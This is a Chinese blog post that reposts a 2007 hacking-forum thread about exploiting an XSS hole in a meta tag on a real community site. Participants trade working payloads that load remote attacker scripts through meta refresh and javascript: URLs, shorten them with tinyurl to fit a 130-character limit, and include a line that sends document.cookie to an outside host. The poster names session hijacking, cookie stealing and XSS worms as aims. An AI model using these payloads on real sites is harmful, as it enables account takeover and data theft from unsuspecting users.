注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

@fc_lamp

关注Web应用解决方案MySql/PHP/Python一盏名为"飞川"的灯~

 
 
 

日志

 
 

关于XSS  

2013-08-17 22:53:14|  分类: Web技术-Js/Html |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
HTML 标签 XSS 表: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Grave_accent_obfuscation

meta标签里如何实现XSS: http://sla.ckers.org/forum/read.php?2,6717 ( 请认真研读回复的内容,备份记录) 

XSS in meta a tag
Posted by: TMA
Date: February 12, 2007 11:05AM

ok, 
this is how it goes. 

i got an xss point in a meta tag. 
<META name="Description" content="XSS here"> 

so if i write : 
0;url=javascript:xss code" HTTP-EQUIV="refresh 
this will generate : 
<META name="Description" content="0;url=javascript:xss code" HTTP-EQUIV="refresh 
"> 

there are few limitations that i found : 
* < > tags are being encoded to &lt; and &gt; 
* i have a limit of 130 chars. 
* no limitation on the ' or " chars. 

what i want to do is to inject some js file here to avoid the 130 chars limitation, and run some code that does something. 

under those limitations, what do you offer to do for js file injection ?

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: Hong
Date: February 12, 2007 12:12PM

php wrote a nice article about how to avoid the size of input limitation. 
http://www.gnucitizen.org/blog/playing-in-large 
Does it help?

- Hong

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 12, 2007 12:25PM

How about:
javascript:document.write(String.fromCharCode(60)+"script src=http://your-site.ru/script.js"+String.fromCharCode(62))

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 12, 2007 12:32PM

the input limitation article didn't helped. 
the limitation is in the DB . 

I will try the second one, thought about that , but didn't tried it yet ... 
thanks . 

i'll post an update on the subject .... 

update : 
this exceeds the 130 chars.... 
need to think how to minimize chars...



Edited 1 time(s). Last edit at 02/12/2007 12:36PM by TMA.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 12, 2007 01:01PM

80 chars:
javascript:document.write(unescape("%3Cscript src=http://your-site.ru/1.js%3E"))



Edited 3 time(s). Last edit at 02/12/2007 01:04PM by hasse.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: rsnake
Date: February 12, 2007 03:19PM

That's a nice one, hasse, plus the URL itself is pretty long. That could definitely be shortened when you are ready to deploy the vector.

- RSnake 
Gotta love it. http://ha.ckers.org

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 12, 2007 03:27PM

ok, 
first, thanks hasse for the help ! 
some updates... 

this is what i enter : 
5;url=javascript:document.write(unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E'))" HTTP-EQUIV="refresh 

and this is what it renders : 
<META name="Description" content="0;url=javascript:document.write(unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E'))" HTTP-EQUIV=" 
refresh"> 

on firefox, after 5 seconds it executes the script in a.js but reloads the page and the original page disapears. 

on the explorer, in does nothing. 

couple question : 
* why on explorer it does not work ? (should it ?) 
* how can i prevent the rerendering of the page on the FF ?

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: ckore
Date: February 13, 2007 06:06AM

It seems that the internet explorer has a problem with javascript within a meta-tag, but I don't know what is possible to use this code with IE. 

What exactly don't you want to be rendered? Ever tried something like this: 
"><script>document.write('<script src=http://yoursite/a.js></scr'+'ipt>')</script> 

Quote

That's a nice one, hasse, plus the URL itself is pretty long. That could definitely be shortened when you are ready to deploy the vector.
Yes, for example by using http://tinyurl.com/ or so. You can encode the whole path to your script (including the scripts filename) so that you finally get http://tinyurl.com/1337 which can be used directly as a script src.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 13, 2007 07:21AM

as i mentioned, < > tags are being encoded to &lt; and &gt; 
so i cant use that. 

my point is that i dont want the page itself to be rerendered. 
it seems like this executes this : 

javascript:document.write(unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E')) 

as a new page, and it does not inject the script to the current page.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 07:26AM

TMA Wrote: 
------------------------------------------------------- 
> as i mentioned, < > tags are being encoded to &lt; 
> and &gt; 
> so i cant use that. 

> my point is that i dont want the page itself to be 
> rerendered. 
> it seems like this executes this : 

> javascript:document.write(unescape('%3Cscript 
> src=http://www.site.com/a.js%3E%3C/script%3E')) 

> as a new page, and it does not inject the script 
> to the current page. 

Maybe you could prevent the reload by using
javascript:document.body.innerHTML+="CODE";
But the page still looks strange if you do that... Is it essential that the page does not reload? Maybe changing where an iframe or image is pointing can work also, but that character limitiation is a hindrance.



Edited 6 time(s). Last edit at 02/13/2007 07:48AM by hasse.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 13, 2007 08:31AM

indeed, 
the char limitation is a tough one. 
this is why i wanted to inject the js file . 

i'll try the suggested approuch, and update here. 

another approach that i thought of, is changing the source of an existing script tag. 
but it seems not to be working. 
any idea why ?

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 09:26AM

For example
javascript:document.body.innerHTML+=unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E');
isn't very long, but it screws up the page. 

Or how about
javascript:void(document.images[0].src='http://site.com/1.jpg?'+document.cookie);

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 13, 2007 09:35AM

hasse Wrote: 
------------------------------------------------------- 

> Or how 
> about javascript:void(document.images[0].src='http: 
> //site.com/1.jpg?'+document.cookie); 

the last one only retrieves me the cookie...

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 09:48AM

TMA Wrote: 
------------------------------------------------------- 
> hasse Wrote: 
> -------------------------------------------------- 
> ----- 

> > Or how 
> > about 
> javascript:void(document.images[0].src='http: 
> > //site.com/1.jpg?'+document.cookie); 

> the last one only retrieves me the cookie... 

That's true, but maybe that's not enough for you?

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: Hong
Date: February 13, 2007 12:20PM

Because it will refresh the page. 
If you want the page remain unchange, try this: 
<META name="Description" content="0;url=javascript:document.write('\x3chtml\x3e\x3cbody\x3e'+document.body.innerHTML+'\x3cscript src=http://site/xss.js\x3e\x3c/script\x3e\x3c/body\x3e\x3c/html\x3e')" HTTP-EQUIV="refresh"> 

I have not count it, maybe it exceed the limitation, if it does exceed, you can using escape() to replace \x by %(it can reduce some bytes), and there are some tag can be delete.

- Hong

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 12:24PM

Hong Wrote: 
------------------------------------------------------- 
> Because it will refresh the page. 
> If you want the page remain unchange, try this: 


> I have not count it, maybe it exceed the 
> limitation, if it does exceed, you can using 
> escape() to replace \x by %(it can reduce some 
> bytes), and there are some tag can be delete. 


Doesn't that give the same result as
javascript:document.body.innerHTML+=unescape('%3Cscript src=http://www.site.com/a.js%3E%3C/script%3E');


And for me, that screws up the page. It seems like that's due to the stylesheet not getting loaded properly. 

javascript:document.body.innerHTML+=unescape('%3Cscript src=http://tinyurl.com/XXXXXX%3E%3Clink rel=stylesheet href=http://tinyurl.com/2oox8e%3E');

Works better...



Edited 2 time(s). Last edit at 02/13/2007 12:52PM by hasse.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: Hong
Date: February 13, 2007 12:34PM

No, that doesn't give the same result. 
document.body.innerHTML only contain all text within <body> and </body> tag, so it doesn't have HTML, HEAD, title and body tag.

- Hong

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 12:42PM

Hong Wrote: 
------------------------------------------------------- 
> No, that doesn't give the same result. 
> document.body.innerHTML only contain all text 
> within and tag, so it doesn't have HTML, HEAD, 
> title and body tag. 


Ok, but they both use "document.body.innerHTML" and both screw up the page when I run it.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: Hong
Date: February 13, 2007 01:17PM

Yes, that method maybe screw up the page under some situations. 
If the page use document.write to write anything, then it had already appended to the document.body.innerHTML, then when it refresh and construct by document.body.innerHTML, it will appear twice. 
All script will be run twice, that means something will appear twice(e.g. alert box).

- Hong

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 13, 2007 02:41PM

Hong Wrote: 
------------------------------------------------------- 
> Yes, that method maybe screw up the page under 
> some situations. 
> If the page use document.write to write anything, 
> then it had already appended to the 
> document.body.innerHTML, then when it refresh and 
> construct by document.body.innerHTML, it will 
> appear twice. 
> All script will be run twice, that means something 
> will appear twice(e.g. alert box). 


Okay, but like I said, when I try it, it seems like the page looses its style-sheet information. And changes appearance significantly.



Edited 1 time(s). Last edit at 02/13/2007 02:42PM by hasse.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: Hong
Date: February 14, 2007 04:05AM

Style definitions goes inside the head section? document.body.innerHTML doesn't include head section.

- Hong

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 14, 2007 08:14AM

Hong Wrote: 
------------------------------------------------------- 
> Style definitions goes inside the head section? 
> document.body.innerHTML doesn't include head 
> section. 


Yes that seems to be the problem. Because if I run any of the examples with document.body.innerHTML the page looses it's style sheet which changes the appearance of the page a lot. But I guess that might be better than just a blank page. 

But something like
javascript:document.body.innerHTML+=unescape('%3Clink rel=stylesheet href=http://tinyurl.com/2oox8e%3E%3Cscript src=http://tinyurl.com/XXXXXX%3E');
prevents that. But it's kind of long.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 14, 2007 08:25AM

ok, you gave me here few ideas... 

first, if the stylesheet goes wrong, you can link it to your own stylesheet vie js file. 

correct me if i'm wrong, but IE7 won't execute javascript in meta tags ? 
another question that rose is, what is the difference between the approach bellow : 

document.body.innerHTML+= 

and that : 
document.write('CODE') 

does it got some advantage over the other ?

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 14, 2007 08:48AM

TMA Wrote: 
------------------------------------------------------- 
> ok, you gave me here few ideas... 

> first, if the stylesheet goes wrong, you can link 
> it to your own stylesheet vie js file. 

> correct me if i'm wrong, but IE7 won't execute 
> javascript in meta tags ? 
> another question that rose is, what is the 
> difference between the approach bellow : 

> document.body.innerHTML+= 

> and that : 
> document.write('CODE') 

> does it got some advantage over the other ? 


"You might as well add the style sheet from your own javascript file instead of right in the meta-tag." Yes of course, that's smarter than what I wrote. 

The difference between those methods seem to be, like you said yourself, that document.write rerenders the page and gives you the code as a new page. Where document.body.innerHTML+= retains most of the original page. 

And yes it seems IE7 does not accept javascript in meta tags.



Edited 3 time(s). Last edit at 02/14/2007 08:53AM by hasse.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 14, 2007 03:51PM

ok, some updates... 
seems that the css binding really get lost in the way, 
so i render the missing line from the js file. 

another wierd phenomena that the "InnerHtml +=" method cause is that links on the page that have a css class, seems not to work at all... 
can anyone pinpoint me the problem ? (Firefox browser...) 

update : 
my mistake, 
the links that does not work are the relative ones... 
any ideas how can i overcome this issue ?



Edited 1 time(s). Last edit at 02/14/2007 04:04PM by TMA.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 14, 2007 05:21PM

TMA Wrote: 
------------------------------------------------------- 
> ok, some updates... 
> seems that the css binding really get lost in the 
> way, 
> so i render the missing line from the js file. 

> another wierd phenomena that the "InnerHtml +=" 
> method cause is that links on the page that have a 
> css class, seems not to work at all... 
> can anyone pinpoint me the problem ? (Firefox 
> browser...) 

> update : 
> my mistake, 
> the links that does not work are the relative 
> ones... 
> any ideas how can i overcome this issue ? 

I thought "<base href" might work but it seems it didn't. But I guess you could take the entire document.body.innerHTML and modify it from the javascript file and go through it all and fix the links and the write it to the page. 

Something like: 

document.write("<html><head><link rel=stylesheet href=http://sla.ckers.org/css/style.css></head>");

var body = document.body.innerHTML;
var body_mod = body.replace("a href=/","a href=http://site.com/");

document.write("<body>"+body_mod+"</body></html>");

Just an example, and you could do more like include the proper title to the page etc.



Edited 2 time(s). Last edit at 02/14/2007 05:24PM by hasse.

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 15, 2007 10:45AM

few updates ... 

i used the replace method to change the relative, it works better with regular expressions. 

here is some update on the attack vector progress. 

this is what goes on the page itself : 
0;url=javascript:document.body.innerHTML+=unescape('%3Cscript src=http://tinyurl.com/%3E');" HTTP-EQUIV="refresh 

and the js file contains those lines : 

// for closing the script tag 
document.body.innerHTML += "</script>" 

// adding the original css 
document.body.innerHTML += "<link rel=stylesheet href=http://www.site.com/tpl/def/styless.css>" 

// adding additional js file that has been cutted for some reason 
document.body.innerHTML += "<script src=href=http://www.site.com/dhtml.js></script>"; 

now what i needed is to change the relative links to full links... 

so, with regEx the job is easy... 

Body = Body.replace(/href=\"\//g,"href=\"http://www.site.com/"); 

and to apply the changes i used : 
document.body.innerHTML = Body; 

hasse, if i'm using the document.write method, i will get some nice recursion that will evantually crash the browser(endless addition of the page itself to the InnerHTML) :) 

now what i've got from 130 chars xss hole in a meta tag to a wide open file that i can do whatever i want with it . 

btw, this is some community site like mySpace, so the possibilities are endless: 
session hijacking, cookie stealing, XSS worms, SEO hack, you name it ... 

this all was a POC. 
but a challanging one .

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: hasse
Date: February 15, 2007 12:34PM

TMA Wrote: 
------------------------------------------------------- 
> few updates ... 

> i used the replace method to change the relative, 
> it works better with regular expressions. 

> here is some update on the attack vector 
> progress. 

> this is what goes on the page itself : 
> 0;url=javascript:document.body.innerHTML+=unescape 
> ('%3Cscript src=http://tinyurl.com/%3E');" 
> HTTP-EQUIV="refresh 

> and the js file contains those lines : 

> // for closing the script tag 
> document.body.innerHTML += "" 

> // adding the original css 
> document.body.innerHTML += "" 

> // adding additional js file that has been cutted 
> for some reason 
> document.body.innerHTML += ""; 

> now what i needed is to change the relative links 
> to full links... 

> so, with regEx the job is easy... 

> Body = 
> Body.replace(/href=\"\//g,"href=\"http://www.site. 
> com/"); 

> and to apply the changes i used : 
> document.body.innerHTML = Body; 

> hasse, if i'm using the document.write method, i 
> will get some nice recursion that will evantually 
> crash the browser(endless addition of the page 
> itself to the InnerHTML) :) 

> now what i've got from 130 chars xss hole in a 
> meta tag to a wide open file that i can do 
> whatever i want with it . 

> btw, this is some community site like mySpace, so 
> the possibilities are endless: 
> session hijacking, cookie stealing, XSS worms, SEO 
> hack, you name it ... 

> this all was a POC. 
> but a challanging one . 


Well, I'm glad you managed to work out a solution. I hope I helped some in the process. :)

Options: Reply?Quote
Re: XSS in meta a tag
Posted by: TMA
Date: February 15, 2007 01:49PM

hasse Wrote: 
------------------------------------------------------- 

> Well, I'm glad you managed to work out a solution. 
> I hope I helped some in the process. :) 


Indeed, you sure helped alot, thanks

Options: Reply?Quote

  评论这张
 
阅读(1094)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017